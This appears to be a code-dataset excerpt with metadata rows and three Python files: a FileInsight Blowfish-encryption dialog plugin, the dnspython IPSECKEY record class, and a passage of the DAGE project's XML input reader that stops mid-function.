| 0.411765
| 0.093023
| 0.039867
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.000772
| 0.205395
| 1,631
| 48
| 77
| 33.979167
| 0.695988
| 0.429185
| 0
| 0
| 0
| 0
| 0.23175
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.055556
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5d07c6912264faadbd6b41b6918a6a30e91f2bc
| 8,638
|
py
|
Python
|
plugins/Operations/Crypto/blowfish_encrypt_dialog.py
|
nmantani/FileInsight-plugins
|
a6b036672e4c72ed06678729a86293212b7213db
|
[
"BSD-2-Clause",
"CC0-1.0",
"MIT"
] | 120
|
2015-02-28T14:49:12.000Z
|
2022-03-27T07:13:24.000Z
|
plugins/Operations/Crypto/blowfish_encrypt_dialog.py
|
nmantani/FileInsight-plugins
|
a6b036672e4c72ed06678729a86293212b7213db
|
[
"BSD-2-Clause",
"CC0-1.0",
"MIT"
] | null | null | null |
plugins/Operations/Crypto/blowfish_encrypt_dialog.py
|
nmantani/FileInsight-plugins
|
a6b036672e4c72ed06678729a86293212b7213db
|
[
"BSD-2-Clause",
"CC0-1.0",
"MIT"
] | 17
|
2016-04-04T15:53:03.000Z
|
2021-12-10T18:07:59.000Z
|
#
# Blowfish encrypt - Encrypt selected region with Blowfish
#
# Copyright (c) 2019, Nobutaka Mantani
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import binascii
import re
import sys
import time
import tkinter
import tkinter.ttk
import tkinter.messagebox
try:
import Cryptodome.Cipher.Blowfish
import Cryptodome.Util.Padding
except ImportError:
exit(-1) # PyCryptodome is not installed
# Print selected items
def encrypt(data, root, cm, ckt, ek, cit, ei):
blowfish_mode = {"ECB":Cryptodome.Cipher.Blowfish.MODE_ECB,
"CBC":Cryptodome.Cipher.Blowfish.MODE_CBC,
"CFB":Cryptodome.Cipher.Blowfish.MODE_CFB,
"OFB":Cryptodome.Cipher.Blowfish.MODE_OFB,
"CTR":Cryptodome.Cipher.Blowfish.MODE_CTR}
mode = cm.get()
key_type = ckt.get()
key = ek.get()
iv_type = cit.get()
iv = ei.get()
if key_type == "Hex":
if re.match("^([0-9A-Fa-f]{2})+$", key):
key = binascii.a2b_hex(key)
else:
tkinter.messagebox.showerror("Error:", message="Key is not in hex format.")
return
else:
key = key.encode()
if mode in ["CBC", "CFB", "OFB", "CTR"] and iv_type == "Hex":
if re.match("^([0-9A-Fa-f]{2})+$", iv):
iv = binascii.a2b_hex(iv)
else:
tkinter.messagebox.showerror("Error:", message="IV is not in hex format.")
return
else:
iv = iv.encode()
if mode in ["CBC", "CFB", "OFB", "CTR"] and len(iv) != Cryptodome.Cipher.Blowfish.block_size:
tkinter.messagebox.showerror("Error:", message="IV size must be %d bytes." % Cryptodome.Cipher.Blowfish.block_size)
return
key_length = len(key)
if key_length < 4 or key_length > 56:
tkinter.messagebox.showerror("Error:", message="Key size must be in the range from 4 bytes and 56 bytes.")
return
try:
if mode == "CFB":
cipher = Cryptodome.Cipher.Blowfish.new(key, blowfish_mode[mode], iv, segment_size=Cryptodome.Cipher.Blowfish.block_size * 8)
elif mode in ["CBC", "OFB"]:
cipher = Cryptodome.Cipher.Blowfish.new(key, blowfish_mode[mode], iv)
elif mode == "CTR": # The first seven bytes of IV are used as nonce and the last byte is used as initial_value (compatible with CyberChef).
cipher = Cryptodome.Cipher.Blowfish.new(key, blowfish_mode[mode], nonce=iv[0:7], initial_value=iv[7])
else:
cipher = Cryptodome.Cipher.Blowfish.new(key, blowfish_mode[mode])
if mode in ["ECB", "CBC"]:
data = Cryptodome.Util.Padding.pad(data, Cryptodome.Cipher.Blowfish.block_size)
d = cipher.encrypt(data)
except Exception as e:
tkinter.messagebox.showerror("Error:", message=e)
root.quit()
exit(1) # Not decrypted
sys.stdout.buffer.write(d)
root.quit()
exit(0) # Decrypted successfully
def combo_mode_selected(root, cm, cit, ei, lc):
mode = cm.get()
if mode == "ECB":
cit.configure(state = "disabled")
ei.configure(state = "disabled")
else:
cit.configure(state = "readonly")
ei.configure(state = "normal")
if mode == "CTR":
lc.grid()
else:
lc.grid_remove()
# Receive data
data = sys.stdin.buffer.read()
# Create input dialog
root = tkinter.Tk()
root.title("Blowfish encrypt")
root.protocol("WM_DELETE_WINDOW", (lambda r=root: r.quit()))
label_mode = tkinter.Label(root, text="Mode:")
label_mode.grid(row=0, column=0, padx=5, pady=5, sticky="w")
combo_mode = tkinter.ttk.Combobox(root, width=5, state="readonly")
combo_mode["values"] = ("ECB", "CBC", "CFB", "OFB", "CTR")
combo_mode.current(0)
combo_mode.grid(row=0, column=1, padx=5, pady=5, sticky="w")
label_key_type = tkinter.Label(root, text="Key type:")
label_key_type.grid(row=1, column=0, padx=5, pady=5, sticky="w")
combo_key_type = tkinter.ttk.Combobox(root, width=5, state="readonly")
combo_key_type["values"] = ("Text", "Hex")
combo_key_type.current(0)
combo_key_type.grid(row=1, column=1, padx=5, pady=5)
label_key = tkinter.Label(root, text="Key:")
label_key.grid(row=1, column=2, padx=5, pady=5, sticky="w")
entry_key = tkinter.Entry(width=32)
entry_key.grid(row=1, column=3, padx=5, pady=5, sticky="w")
entry_key.focus() # Focus to this widget
label_iv_type = tkinter.Label(root, text="IV type:")
label_iv_type.grid(row=2, column=0, padx=5, pady=5, sticky="w")
combo_iv_type = tkinter.ttk.Combobox(root, width=5, state="readonly")
combo_iv_type["values"] = ("Text", "Hex")
combo_iv_type.current(0)
combo_iv_type.grid(row=2, column=1, padx=5, pady=5)
label_iv = tkinter.Label(root, text="IV:")
label_iv.grid(row=2, column=2, padx=5, pady=5, sticky="w")
entry_iv = tkinter.Entry(width=32)
entry_iv.grid(row=2, column=3, padx=5, pady=5, sticky="w")
button = tkinter.Button(root, text="OK", command=(lambda data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei)))
button.grid(row=3, column=0, padx=5, pady=5, columnspan=4)
label_ctr = tkinter.Label(root, text="Note:\nThe first seven bytes of IV are used as the nonce and the last one\nbyte is used as the initial value of the counter (compatible with\nCyberChef).", justify="left")
label_ctr.grid(row=4, column=0, padx=5, pady=5, columnspan=4, sticky="w")
label_ctr.grid_remove()
# Set callback functions
combo_mode.bind('<<ComboboxSelected>>', lambda event, root=root, cm=combo_mode, cit=combo_iv_type, ei=entry_iv, lc=label_ctr: combo_mode_selected(root, cm, cit, ei, lc))
combo_mode.bind("<Return>", lambda event, data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei))
combo_key_type.bind("<Return>", lambda event, data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei))
entry_key.bind("<Return>", lambda event, data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei))
combo_iv_type.bind("<Return>", lambda event, data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei))
entry_iv.bind("<Return>", lambda event, data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei))
button.bind("<Return>", lambda event, data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei))
# These are disabled in the initial state (ECB mode)
combo_iv_type.configure(state = "disabled")
entry_iv.configure(state = "disabled")
# Adjust window position
sw = root.winfo_screenwidth()
sh = root.winfo_screenheight()
root.update_idletasks() # Necessary to get width and height of the window
ww = root.winfo_width()
wh = root.winfo_height()
root.geometry('+%d+%d' % ((sw/2) - (ww/2), (sh/2) - (wh/2)))
root.mainloop()
exit(1) # Not decrypted
| 44.297436
| 210
| 0.678629
| 1,310
| 8,638
| 4.363359
| 0.207634
| 0.019944
| 0.058782
| 0.020994
| 0.480231
| 0.393982
| 0.349895
| 0.329076
| 0.28394
| 0.222183
| 0
| 0.0131
| 0.186965
| 8,638
| 194
| 211
| 44.525773
| 0.800797
| 0.205487
| 0
| 0.146154
| 0
| 0.007692
| 0.103636
| 0
| 0
| 0
| 0
| 0.005155
| 0
| 1
| 0.015385
| false
| 0
| 0.076923
| 0
| 0.123077
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5d16bd87f7bfb96643e0e75dbd1d494645de558
| 5,734
|
py
|
Python
|
dns/rdtypes/IN/IPSECKEY.py
|
preo/dnspython
|
465785f85f87508209117264c677080e901e957c
|
[
"0BSD"
] | null | null | null |
dns/rdtypes/IN/IPSECKEY.py
|
preo/dnspython
|
465785f85f87508209117264c677080e901e957c
|
[
"0BSD"
] | null | null | null |
dns/rdtypes/IN/IPSECKEY.py
|
preo/dnspython
|
465785f85f87508209117264c677080e901e957c
|
[
"0BSD"
] | null | null | null |
# Copyright (C) 2006, 2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import cStringIO
import struct
import dns.exception
import dns.inet
import dns.name
class IPSECKEY(dns.rdata.Rdata):
"""IPSECKEY record
@ivar precedence: the precedence for this key data
@type precedence: int
@ivar gateway_type: the gateway type
@type gateway_type: int
@ivar algorithm: the algorithm to use
@type algorithm: int
@ivar gateway: the public key
@type gateway: None, IPv4 address, IPV6 address, or domain name
@ivar key: the public key
@type key: string
@see: RFC 4025"""
__slots__ = ['precedence', 'gateway_type', 'algorithm', 'gateway', 'key']
def __init__(self, rdclass, rdtype, precedence, gateway_type, algorithm,
gateway, key):
super(IPSECKEY, self).__init__(rdclass, rdtype)
if gateway_type == 0:
if gateway != '.' and not gateway is None:
raise SyntaxError('invalid gateway for gateway type 0')
gateway = None
elif gateway_type == 1:
# check that it's OK
junk = dns.inet.inet_pton(dns.inet.AF_INET, gateway)
elif gateway_type == 2:
# check that it's OK
junk = dns.inet.inet_pton(dns.inet.AF_INET6, gateway)
elif gateway_type == 3:
pass
else:
raise SyntaxError('invalid IPSECKEY gateway type: %d' % gateway_type)
self.precedence = precedence
self.gateway_type = gateway_type
self.algorithm = algorithm
self.gateway = gateway
self.key = key
def to_text(self, origin=None, relativize=True, **kw):
if self.gateway_type == 0:
gateway = '.'
elif self.gateway_type == 1:
gateway = self.gateway
elif self.gateway_type == 2:
gateway = self.gateway
elif self.gateway_type == 3:
gateway = str(self.gateway.choose_relativity(origin, relativize))
else:
raise ValueError('invalid gateway type')
return '%d %d %d %s %s' % (self.precedence, self.gateway_type,
self.algorithm, gateway,
dns.rdata._base64ify(self.key))
def from_text(cls, rdclass, rdtype, tok, origin = None, relativize = True):
precedence = tok.get_uint8()
gateway_type = tok.get_uint8()
algorithm = tok.get_uint8()
if gateway_type == 3:
gateway = tok.get_name().choose_relativity(origin, relativize)
else:
gateway = tok.get_string()
chunks = []
while 1:
t = tok.get().unescape()
if t.is_eol_or_eof():
break
if not t.is_identifier():
raise dns.exception.SyntaxError
chunks.append(t.value)
b64 = ''.join(chunks)
key = b64.decode('base64_codec')
return cls(rdclass, rdtype, precedence, gateway_type, algorithm,
gateway, key)
from_text = classmethod(from_text)
def to_wire(self, file, compress = None, origin = None):
header = struct.pack("!BBB", self.precedence, self.gateway_type,
self.algorithm)
file.write(header)
if self.gateway_type == 0:
pass
elif self.gateway_type == 1:
file.write(dns.inet.inet_pton(dns.inet.AF_INET, self.gateway))
elif self.gateway_type == 2:
file.write(dns.inet.inet_pton(dns.inet.AF_INET6, self.gateway))
elif self.gateway_type == 3:
self.gateway.to_wire(file, None, origin)
else:
raise ValueError('invalid gateway type')
file.write(self.key)
def from_wire(cls, rdclass, rdtype, wire, current, rdlen, origin = None):
if rdlen < 3:
raise dns.exception.FormError
header = struct.unpack('!BBB', wire[current : current + 3])
gateway_type = header[1]
current += 3
rdlen -= 3
if gateway_type == 0:
gateway = None
elif gateway_type == 1:
gateway = dns.inet.inet_ntop(dns.inet.AF_INET,
wire[current : current + 4])
current += 4
rdlen -= 4
elif gateway_type == 2:
gateway = dns.inet.inet_ntop(dns.inet.AF_INET6,
wire[current : current + 16])
current += 16
rdlen -= 16
elif gateway_type == 3:
(gateway, cused) = dns.name.from_wire(wire[: current + rdlen],
current)
current += cused
rdlen -= cused
else:
raise dns.exception.FormError('invalid IPSECKEY gateway type')
key = wire[current : current + rdlen].unwrap()
return cls(rdclass, rdtype, header[0], gateway_type, header[2],
gateway, key)
from_wire = classmethod(from_wire)
| 38.743243
| 81
| 0.591734
| 688
| 5,734
| 4.819767
| 0.257267
| 0.119421
| 0.049759
| 0.034379
| 0.271713
| 0.226176
| 0.191797
| 0.124849
| 0.068758
| 0.025332
| 0
| 0.018108
| 0.316184
| 5,734
| 147
| 82
| 39.006803
| 0.827595
| 0.202302
| 0
| 0.28972
| 0
| 0
| 0.047239
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046729
| false
| 0.018692
| 0.046729
| 0
| 0.158879
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5d2163f998824781f4cf67aa89ebfc2260b9f51
| 42,648
|
py
|
Python
|
python/input_reader.py
|
dagesundholm/DAGE
|
0d0ef1d3e74ba751ca4d288db9f1ac7f9a822138
|
[
"MIT"
] | 3
|
2018-03-29T08:48:57.000Z
|
2020-02-16T22:40:22.000Z
|
python/input_reader.py
|
dagesundholm/DAGE
|
0d0ef1d3e74ba751ca4d288db9f1ac7f9a822138
|
[
"MIT"
] | null | null | null |
python/input_reader.py
|
dagesundholm/DAGE
|
0d0ef1d3e74ba751ca4d288db9f1ac7f9a822138
|
[
"MIT"
] | 1
|
2019-04-08T14:40:57.000Z
|
2019-04-08T14:40:57.000Z
|
"""---------------------------------------------------------------------------------*
* Copyright (c) 2010-2018 Pauli Parkkinen, Eelis Solala, Wen-Hua Xu, *
* Sergio Losilla, Elias Toivanen, Jonas Juselius *
* *
* Permission is hereby granted, free of charge, to any person obtaining a copy *
* of this software and associated documentation files (the "Software"), to deal *
* in the Software without restriction, including without limitation the rights *
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell *
* copies of the Software, and to permit persons to whom the Software is *
* furnished to do so, subject to the following conditions: *
* *
* The above copyright notice and this permission notice shall be included in all*
* copies or substantial portions of the Software. *
* *
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR *
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, *
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE *
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER *
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, *
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE *
* SOFTWARE. *
*----------------------------------------------------------------------------------"""
# Input file reader
import os
import sys
import xml.etree.ElementTree as ET
import numpy, ast
from .generate_objects import SettingsGenerator
from collections import OrderedDict
class InputProgrammingError(Exception):
pass
class InputXML(object):
tag_type = 'input'
definition_tag = 'input_definition'
def __init__(self, filename = None, \
definition_filename = None,\
input_object = None,\
parent_object = None,\
definition = None, \
directory = None):
if (input_object is not None):
self.root = input_object
elif filename is not None:
if definition_filename is None:
definition_filename = os.path.dirname(os.path.realpath(__file__))+"/input_parameters.xml"
if os.path.exists(filename):
self.tree = ET.parse(filename)
self.root = self.tree.getroot()
else:
print("Path for definition file: '{}' does not exist".format(filename))
else:
self.root = None
self.parent_object = parent_object
if directory is not None:
self.directory = directory
elif filename is not None and os.path.exists(filename):
self.directory = os.path.dirname(filename)
elif self.parent_object is not None:
self.directory = self.parent_object.directory
else:
self.directory = None
if definition is not None:
self.definition = definition
elif definition_filename is not None:
if os.path.exists(definition_filename):
definition = ET.parse(definition_filename)
self.definition = definition.getroot()
else:
sys.exit("Input definition filename does not exist: {}".format(definition_filename))
elif self.parent_object is not None:
definition = self.parent_object.definition.find(self.definition_tag)
if definition is not None:
self.definition = definition
else:
sys.exit("Definition tag '{}' not found from parent definition tree", self.definition_tag)
else:
sys.exit("Definition tag input not given.")
self.retrieve()
def prepare(self):
"""
Prepare the input to have all things required to
call the Fortran interface
"""
self.parse()
self.handle_folders()
self.fill_id_values()
kwargs = OrderedDict()
self.get_interface_argument_values(kwargs)
return kwargs
def form_new_directory_path(self, path_text, original_directory = None):
"""
Creates a new directory path from 'path_text' and 'original_directory' and
validate that it exists. Returns the new path.
"""
if original_directory is not None:
complete_path = os.path.join(original_directory, path_text)
else:
complete_path = path_text
directory_path = os.path.dirname(complete_path)
# check if the path exists
if not os.path.exists(directory_path):
raise Exception("Error: '{}' tag path '{}' does not exist".format(self.tag_type, complete_path))
return directory_path
def retrieve_path(self, path_text, directory):
"""
Retrieves content of xml file at path 'path_text'
to and store it to 'parameter_name' atribute of 'self'.
"""
if directory is not None:
complete_path = os.path.join(directory, path_text)
else:
complete_path = path_text
# check if the path exists
if os.path.exists(complete_path):
tree = ET.parse(complete_path)
return tree.getroot()
else:
raise Exception("Error: '{}' tag path '{}' does not exist".format(self.tag_type, complete_path))
def retrieve(self):
"""
Retrieves content to the tag from external file(s),
if the tag has attribute or child named 'path' and/or
'extends_path'.
"""
if self.root is not None:
# check if current tag has an attribute or child with
# name 'path'
path_text = InputXML.read_tag_or_attribute_value(self.root, 'path')
# try to retrieve the content from path_text
if path_text is not None and path_text != "":
try:
self.root = self.retrieve_path(path_text, self.directory)
self.directory = self.form_new_directory_path(path_text, self.directory)
except Exception as e:
sys.exit(str(e))
# check if current tag has an attribute or child with
# name 'extends_path'
path_text = InputXML.read_tag_or_attribute_value(self.root, 'extends_path')
self.extends_roots = []
self.extends_directories = []
directory = self.directory
while path_text is not None:
# try to retrieve the content from path_text
try:
self.extends_roots.append(self.retrieve_path(path_text, directory))
self.extends_directories.append(self.form_new_directory_path(path_text, directory))
except Exception as e:
sys.exit(str(e))
# prepare for the next loop by getting the next extends path and corresponding directory
directory = self.extends_directories[-1]
path_text = InputXML.read_tag_or_attribute_value(self.extends_roots[-1], 'extends_path')
def fill_id_values(self):
"""
Finds the id for each parameter where reference is made with name
and fills it to the correct place
"""
for parameter_name in self.parameter_values:
if parameter_name.endswith("_id"):
# check if the tag has value that is not 0, in that case
# we are not finding the value
if self.get_parameter_value(parameter_name) == 0:
tagtype = parameter_name[:parameter_name.rfind('_')]
name_tag_found = tagtype+"_name" in self.parameter_values
if name_tag_found:
name = self.parameter_values[tagtype+"_name"]
if name is not None and name != "":
id_value = self.get_tagid_for_name(tagtype, name)
if id_value != -1:
self.parameter_values[parameter_name] = id_value
for child in self.children:
child.fill_id_values()
def get_tagid_for_name(self, tagtype, name):
if self.parent_object is not None:
for child in self.parent_object.children:
if hasattr(child, 'tag_type') and child.tag_type == tagtype and hasattr(child, 'name') and child.name == name:
return child.id
return -1
def get_parameter_definition(self, parameter_name):
"""
Retrieve the parameter definition for parameter name
'parameter_name'.
"""
for parameter_definition in self.definition.findall('parameter'):
if parameter_definition.attrib['name'] == parameter_name:
return parameter_definition
return None
def get_definition_tag(self, tag_name):
"""
Retrieve the definition tag for a tag with name = tag_name
"""
definition = self.definition.find('{}'.format(tag_name))
return definition
def _parse_children(self, root, directory):
"""
Parse children of root xml-tag 'root' and store them as
children in the 'self'.
Note: this function is a subfunctionality of function 'parse'
and it should not be used independently.
"""
for tag in root:
if tag.tag not in self.parameter_values:
# try to find the correct definition tag by using the "*_input"-format
definition = self.definition.find('{}_input'.format(tag.tag))
# if the input definition was not found, try to find the definition from
# the '<class>'-tags
if definition is None:
definition_found = False
for definition_tag in self.definition.findall('class'):
if definition_tag.attrib['name'] == tag.tag:
definition = definition_tag
definition_found = True
break
if not definition_found:
print("Warning: Found unknown tag with name '{}'. Ignoring.".format(tag.tag))
continue
else:
child = InputXML(parent_object = self, definition = definition, input_object = tag, directory = directory)
else:
if tag.tag == 'settings':
child = SettingsXML(parent_object = self, definition = definition, input_object = tag, directory = directory)
elif tag.tag == 'structure':
child = StructureXML(parent_object = self, definition = definition, input_object = tag, directory = directory)
elif tag.tag == 'basis_set':
child = BasisSetXML(parent_object = self, definition = definition, input_object = tag, directory = directory)
elif tag.tag == 'action':
child = ActionXML(parent_object = self, definition = definition, input_object = tag, directory = directory)
elif tag.tag == 'scf_energetics':
child = SCFEnergeticsXML(parent_object = self, definition = definition, input_object = tag, directory = directory)
self.children.append(child)
self.child_definitions.append(tag.tag)
self.add_counters(child)
child.parse()
def parse(self):
"""
Parse paremeters and child xml-tags of the root-xml tags stored
in self.root and self.extends_roots. Stores the found child-xml classes
to 'self.children' and the parameter values to 'self.parameter_values'.
The corresponding definitions are stored to 'self.child_definitions' and
'self.parameter_definitions', respectively.
User must note that this function is recursive as it calls 'parse' for
all found children in '_parse_children' calls.
"""
self.parameter_values = OrderedDict()
self.parameter_definitions = OrderedDict()
self.children = []
self.child_definitions = []
# handle the parameters first
for parameter_definition in self.definition.findall('parameter'):
if SettingsGenerator.is_valid_parameter(parameter_definition):
self.set_parameter_value(parameter_definition, self.read_parameter_value(parameter_definition))
self.parameter_definitions[parameter_definition.attrib['name']] = parameter_definition
if parameter_definition.attrib['name'] == 'name':
self.name = self.parameter_values['name']
else:
print("PARAMETER is not valid", parameter_definition.attrib['name'])
# if the object has extends_root, then parse the children from it
# and store them to 'self'
if hasattr(self, 'extends_roots') and self.extends_roots is not None\
and hasattr(self, 'extends_directories') and self.extends_directories is not None:
for i, extends_root in enumerate(self.extends_roots):
self._parse_children(extends_root, self.extends_directories[i])
# parse the children from the xml-root of this object and store them
# to 'self'
if self.root is not None:
self._parse_children(self.root, self.directory)
# add the tag classes that are not found in the input file, just to
# input the default values.
for definition_tag in self.definition.findall('class'):
if definition_tag.attrib['name'] not in self.child_definitions:
child = InputXML(parent_object = self, definition = definition_tag)
self.children.append(child)
child.parse()
def handle_folders(self):
"""
Creates missing folders and replaces relative paths with
non-relative ones
"""
for parameter_name in self.parameter_values:
if parameter_name in ['output_folder', 'input_folder', 'folder_path']:
if self.parameter_values[parameter_name] is not None:
# convert the non absolute paths to absolute ones
if not os.path.isabs(self.parameter_values[parameter_name]):
# join the directory of the file with the input directory
path = os.path.join(self.directory, self.parameter_values[parameter_name])
# make the path more readable by removing extra slashes and dots
self.parameter_values[parameter_name] = os.path.normpath(path)
# if the output folder does not exist, create it
if parameter_name == 'output_folder' and not os.path.exists(self.parameter_values[parameter_name]):
os.makedirs(self.parameter_values[parameter_name])
for child in self.children:
child.handle_folders()
def get_interface_argument_values(self, argument_values, parameter_definitions = {}, abbreviation = None, counter_present = False):
"""
This function converts the values of the parameters to a form suitable for the
Fortran interface. The converted values are stored to input-output dictionary 'arguments_values'.
"""
if 'abbreviation' in self.definition.attrib:
abbreviation = self.definition.attrib['abbreviation']
for parameter_name in self.parameter_values:
if SettingsGenerator.generate_fortran(self.parameter_definitions[parameter_name]):
if abbreviation is not None:
argument_key = "{}_{}".format(abbreviation, parameter_name)
else:
argument_key = parameter_name
if counter_present:
# Check if the parameter value is None. If the value is None, the
# parameter is not present in the input file, and the default
# value of the parameter is not specified.
if self.parameter_values[parameter_name] is not None:
if argument_key in argument_values and argument_values[argument_key] is not None:
argument_values[argument_key].append(self.parameter_values[parameter_name])
else:
argument_values[argument_key] = [self.parameter_values[parameter_name]]
parameter_definitions[argument_key] = self.parameter_definitions[parameter_name]
else:
if argument_key not in parameter_definitions:
argument_values[argument_key] = None
parameter_definitions[argument_key] = self.parameter_definitions[parameter_name]
else:
if argument_key in argument_values:
print("Warning: Found two (or more) arguments for the same parameter: {}".format(argument_key))
else:
argument_values[argument_key] = self.parameter_values[parameter_name]
parameter_definitions[argument_key] = self.parameter_definitions[parameter_name]
for child in self.children:
if 'global_index_counter' in child.definition.attrib or 'local_index_counter' in child.definition.attrib or 'counters' in child.definition.attrib:
counter_present = True
if SettingsGenerator.generate_fortran(child.definition):
child.get_interface_argument_values(argument_values, parameter_definitions, abbreviation = abbreviation, counter_present = counter_present)
# if we are at the root, convert the values with type list to numpy arrays
if self.parent_object is None:
for argument_key in list(argument_values):
# the string lists need some special attention:
if parameter_definitions[argument_key].attrib['type'].startswith('string') and type(argument_values[argument_key]) == list:
temp = numpy.empty((256, len(argument_values[argument_key])+1), dtype="c")
for j, value in enumerate(argument_values[argument_key]):
temp[:, j] = "{0:{width}}".format(argument_values[argument_key][j], width=256)
argument_values[argument_key] = numpy.array(temp, dtype="c").T
elif type(argument_values[argument_key]) == list:
temp_array = numpy.array(argument_values[argument_key], order='F').T
shape = temp_array.shape
if len(shape) == 3:
new_shape = (shape[0], shape[1], shape[2]+1)
elif len(shape) == 2:
new_shape = (shape[0], shape[1]+1)
else:
new_shape = (shape[0]+1)
new_array = numpy.empty(new_shape, order='F')
if len(shape) == 3:
new_array[:, :, :shape[2]] = temp_array[:, :, :]
elif len(shape) == 2:
new_array[:, :shape[1]] = temp_array[:, :]
else:
new_array[:shape[0]] = temp_array[:]
argument_values[argument_key] = new_array
elif argument_values[argument_key] is None:
del argument_values[argument_key]
def add_counters(self, child):
"""
Add all the counter values for the child object 'child' of 'self' by one
"""
if 'global_index_counter' in child.definition.attrib:
success = self.add_counter_value(child.definition.attrib['global_index_counter'])
if not success:
print("Warning: Adding counter {} failed. Counter not found.".format(child.definition.attrib['global_index_counter']))
else:
child.id = self.get_counter_value(child.definition.attrib['global_index_counter'])
if 'local_index_counter' in child.definition.attrib:
success = self.add_counter_value(child.definition.attrib['local_index_counter'])
if not success:
print("Warning: Adding counter {} failed. Counter not found.".format(child.definition.attrib['local_index_counter']))
if 'counters' in child.definition.attrib:
success = self.add_counter_value(child.definition.attrib['counters'])
if not success:
print("Warning: Adding counter {} failed. Counter not found.".format(child.definition.attrib['counters']))
def add_counter_value(self, counter_name):
"""
Add value of counter parameter with name=='counter_name' by one.
If the counter is not found in the local object, it
is seached from the parent objects.
"""
if counter_name in self.parameter_values:
if self.parameter_values[counter_name] is None:
self.parameter_values[counter_name] = 0
self.parameter_values[counter_name] += 1
return True
else:
if self.parent_object is not None:
return self.parent_object.add_counter_value(counter_name)
else:
return False
def get_counter_value(self, counter_name):
"""
Get the value of a counter with name 'counter_name'.
If the counter is not found in the local object, it
is seached from the parent objects.
"""
if counter_name in self.parameter_values:
return self.parameter_values[counter_name]
else:
if self.parent_object is not None:
